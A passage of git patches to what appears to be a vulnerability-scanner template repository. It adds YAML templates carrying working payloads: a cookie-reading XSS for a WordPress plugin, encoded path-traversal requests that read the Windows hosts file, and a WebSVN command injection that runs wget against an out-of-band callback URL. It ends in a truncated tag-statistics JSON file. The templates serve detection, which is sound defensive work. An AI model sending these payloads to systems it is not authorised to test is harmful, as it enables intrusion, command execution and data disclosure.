Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5d5dafc6e72e7fa366b2422d0dc74346928e36ea Mon Sep 17 00:00:00 2001 From: juan mesaglio Date: Mon, 26 Jul 2021 20:12:26 -0300 Subject: [PATCH 1173/4083] Detect azure directory traversal hosts file --- .../other/azure-path-traversal.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/azure-path-traversal.yaml diff --git a/vulnerabilities/other/azure-path-traversal.yaml b/vulnerabilities/other/azure-path-traversal.yaml new file mode 100644 index 0000000000..e8561db2aa --- /dev/null +++ b/vulnerabilities/other/azure-path-traversal.yaml @@ -0,0 +1,28 @@ +id: azure-directory-traversal + +info: + name: Azure Directory Traversal + author: mesaglio + severity: high + description: Detect azure directory traversal hosts file. + +requests: + - method: GET + path: + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/system32/drivers/etc/hosts" + - "{{BaseURL}}/./../../../../../../../../../../windows/system32/drivers/etc/hosts" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/system32/drivers/etc/hosts" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/system32/drivers/etc/hosts" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/system32/drivers/etc/hosts" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/system32/drivers/etc/hosts" + - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts" + + matchers-condition: or + matchers: + - type: status + status: + - 200 + - type: word + words: + - "localhost" + part: body \ No newline at end of file From c8b1186d80aed03105a6ae2214ff4870010bf319 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:15:56 +0700 Subject: [PATCH 1174/4083] Create opensis-detect.yaml --- technologies/opensis-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/opensis-detect.yaml diff --git a/technologies/opensis-detect.yaml b/technologies/opensis-detect.yaml new file mode 100644 index 0000000000..bf71bbe890 --- /dev/null +++ b/technologies/opensis-detect.yaml @@ -0,0 +1,25 @@ +id: opensis-detect + +info: + name: OpenSIS Detect + author: pikpikcu + severity: info + tags: tech,opensis + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/opensis/index.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "openSIS Student Information System" + + - type: status + status: + - 200 From 12b832cc364fe52ea83f320a861fdc16b0509a69 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 27 Jul 2021 09:24:35 +0900 Subject: [PATCH 1175/4083] Create CVE-2021-32305.yaml WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-32305.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-32305.yaml diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml new file mode 100644 index 0000000000..b188151e6b --- /dev/null +++ b/cves/2021/CVE-2021-32305.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-32305 + +info: + name: Websvn 2.6.0 - Remote Code Execution (Unauthenticated) + description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + author: gy741 + severity: critical + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 + - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + tags: cve,cve2021,websvn,rce,oob + +requests: + - raw: + - | + GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 44c0757a23ac9d334927a37008ea44c4cc651a3e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 27 Jul 2021 00:25:35 +0000 Subject: [PATCH 1176/4083] Auto Generated Templates Stats [Tue Jul 27 00:25:35 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1215 +++++++++++++++++++++--------------------- TOP-10.md | 8 +- 3 files changed, 613 insertions(+), 612 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 7f012a1194..4f260da111 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik 